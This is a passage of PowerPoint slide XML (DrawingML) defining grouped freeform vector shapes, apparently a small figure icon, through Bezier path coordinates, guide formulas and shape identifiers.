                      <a:pt x="141" y="618"/>
                      <a:pt x="115" y="657"/>
                      <a:pt x="91" y="699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="845"/>
                      <a:pt x="0" y="973"/>
                      <a:pt x="68" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="991"/>
                      <a:pt x="116" y="983"/>
                      <a:pt x="145" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="118"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="720" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A0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709" name="Group 1177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B034B95-4998-4E3C-B489-C94E3ABC2C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7274" y="3044009"/>
              <a:ext cx="755879" cy="438053"/>
              <a:chOff x="1585" y="2181"/>
              <a:chExt cx="635" cy="368"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2152" name="Group 913">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8011CE0C-40DE-44A1-8EAE-44E6653237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850" y="2181"/>
                <a:ext cx="133" cy="318"/>
                <a:chOff x="3735" y="3265"/>
                <a:chExt cx="468" cy="1120"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2173" name="Freeform 914">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC10016F-7749-4AAB-9194-E91CA1D6A46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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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74" name="Freeform 915">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806ACEF4-ABF7-4076-AE15-F34218A5960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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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75" name="Freeform 916">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE8E3BE-F602-4C4F-9FD3-A95E1FAF3A1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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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76" name="Freeform 917">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18988692-1AD9-422C-83DB-A7714955028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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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77" name="Freeform 918">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7BADF2-DE06-42AB-BC09-D2EA326D311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86" y="3390"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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78" name="Freeform 919">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED82514-6A89-4681-BFFA-C1FEC578D31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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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79" name="Freeform 920">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1836FC1F-EED7-485D-A86B-B9AAFA9A6BA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65" y="3265"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 41 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1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80" name="Freeform 921">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8533E520-C33D-4CBC-B57E-4A692ED410B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938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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81" name="Freeform 922">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B5621F-EAF8-47F4-933A-E4A9780BBB7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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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82" name="Freeform 923">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD3A4D7-2399-421F-982D-4944A9EEE93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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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83" name="Freeform 924">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C282EF3B-EDAF-41FD-BBCE-35045666BE6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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
